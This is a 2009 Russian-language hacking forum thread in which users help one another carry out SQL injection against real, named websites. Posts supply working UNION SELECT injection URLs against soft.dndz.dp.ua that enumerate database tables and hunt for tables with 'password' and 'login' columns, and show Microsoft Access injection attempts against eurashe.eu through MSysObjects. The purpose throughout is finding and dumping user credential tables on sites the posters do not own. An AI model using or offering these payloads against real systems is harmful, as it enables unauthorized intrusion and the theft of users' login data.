14.01.2009, 05:56
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
угу...спс.
а не подскажите прогу для поиска sql уязвимостей на сайте?
а язна, гугль рулит....но хотелось бы ваши личные советы
|
|
|
14.01.2009, 07:19
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
Всем, хай.
Подскажите.
Есть скуля, далее:
=-77+union+select+1,2,3,4,5,6,7,8,9,10--
вываливается ошибка:
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10-- ' at line 4
Я так понимаю я не правильно строю запрос?
Попробовал несколько вариантов, тоже самое.
Подскажите, где косяк?
|
|
|
|
14.01.2009, 07:20
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
Сообщение от Octave_Parango
Всем, хай.
Подскажите.
Есть скуля, далее:
=-77+union+select+1,2,3,4,5,6,7,8,9,10--
вываливается ошибка:
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10-- ' at line 4
Я так понимаю я не правильно строю запрос?
Попробовал несколько вариантов, тоже самое.
Подскажите, где косяк?
дай ссыль полную
это скуля
|
|
|
|
14.01.2009, 07:19
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
=-77'+union+select+1,2,3,4,5,6,7,8,9,10--
?
|
|
|
|
14.01.2009, 07:28
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
мужики, 407 таблиц...помогите найти нужную, плиз
Код:
http://soft.dndz.dp.ua/program.php?id=-781%20UNION%20SELECT%201,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15%20FROM%20INFORMATION_SCHEMA.TABLES%20limit%20392,1%20--
|
|
|
|
14.01.2009, 07:48
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Вот запрос - выдергивает все таблицы, в которых есть колонка "password"
Код:
http://soft.dndz.dp.ua/program.php?id=-781+UNION+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x70617373776f7264--
С колонкой - login
Код:
http://soft.dndz.dp.ua/program.php?id=-781+UNION+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x6c6f67696e--
Последний раз редактировалось R1dex; 14.01.2009 в 07:59..
|
|
|
|
14.01.2009, 07:53
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
нихрена не пойму, там на сайте есть форум....а где табла с юзерами??? 
Последний раз редактировалось vakula; 14.01.2009 в 08:04..
|
|
|
|
14.01.2009, 08:48
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
from+users--
|
|
|
|
14.01.2009, 10:21
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Код:
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+order+by+23&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
Насколько я помню, в access, в запросе обязательно должна присутствовать таблица.. Вот только ни одну не подобрать...
Последний раз редактировалось R1dex; 14.01.2009 в 10:52..
|
|
|
|
14.01.2009, 10:42
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами:
10200612
Репутация:
168
|
|
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+f rom+MSysObjects&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C ~Pg0.asp
это Microsoft Access статья https://forum.antichat.ru/showthread.php?t=50550
===== R1dex
И что? Это системная табла и как я вижу - доступ закрыт.
я не видел что ты уже отписался 
Последний раз редактировалось big_BRAT; 14.01.2009 в 10:49..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Комбинированный вид
